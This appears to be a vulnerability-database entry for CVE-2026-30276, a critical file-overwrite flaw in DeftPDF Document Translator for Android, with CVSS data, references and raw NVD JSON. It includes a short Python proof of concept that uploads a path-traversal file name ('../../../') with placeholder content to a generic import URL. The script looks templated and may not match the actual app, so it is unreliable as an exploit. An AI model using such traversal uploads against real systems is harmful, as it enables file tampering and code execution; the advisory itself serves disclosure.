CVE-2026-30276

Description

An arbitrary file overwrite vulnerability in DeftPDF Document Translator v54.0 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:deftpdf:document_translator:54.0:*:*:*:*:android:*:* - VULNERABLE

DeftPDF Document Translator v54.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target_url = "http://target-host/import"
# Malicious file content to be written
malicious_content = "<malicious_code>"

# Path to overwrite (e.g., a critical config file or script)
file_path = "../../../critical_system_file.txt"

files = {
    'file': (file_path, malicious_content)
}

response = requests.post(target_url, files=files)

if response.status_code == 200:
    print("[+] Exploit successful, file potentially overwritten.")
else:
    print("[-] Exploit failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30276
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30276
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30276/
[4] VulDB https://vuldb.com/cve/CVE-2026-30276
[5] https://deftpdf.com/
[6] https://github.com/Secsys-FDU/AF_CVEs/issues/22
[7] https://secsys.fudan.edu.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30276", "sourceIdentifier": "[email protected]", "published": "2026-03-31T16:16:29.683", "lastModified": "2026-04-06T15:13:59.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in DeftPDF Document Translator v54.0 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:deftpdf:document_translator:54.0:*:*:*:*:android:*:*", "matchCriteriaId": "213D7F67-1E3F-49B2-A7FA-22ED1F178987"}]}]}], "references": [{"url": "https://deftpdf.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/22", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}